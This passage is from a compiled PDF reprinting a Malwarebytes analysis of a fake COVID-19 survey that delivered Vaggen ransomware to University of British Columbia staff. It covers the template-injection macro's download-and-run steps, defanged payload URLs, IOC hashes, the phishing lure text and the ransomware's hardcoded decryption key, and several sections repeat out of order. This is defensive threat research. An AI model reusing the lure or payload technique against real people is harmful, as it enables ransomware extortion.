(template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 224 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 225 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 226 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 227 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 228 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 229 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 230 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 231 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 232 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 233 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 234 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 235 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 236 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 237 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 238 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 239 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 240 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 241 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 242 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 243 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 244 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 245 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 246 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 247 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 248 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 249 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 250 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 251 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 252 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 253 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 254 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 255 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 256 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 257 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 258 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the 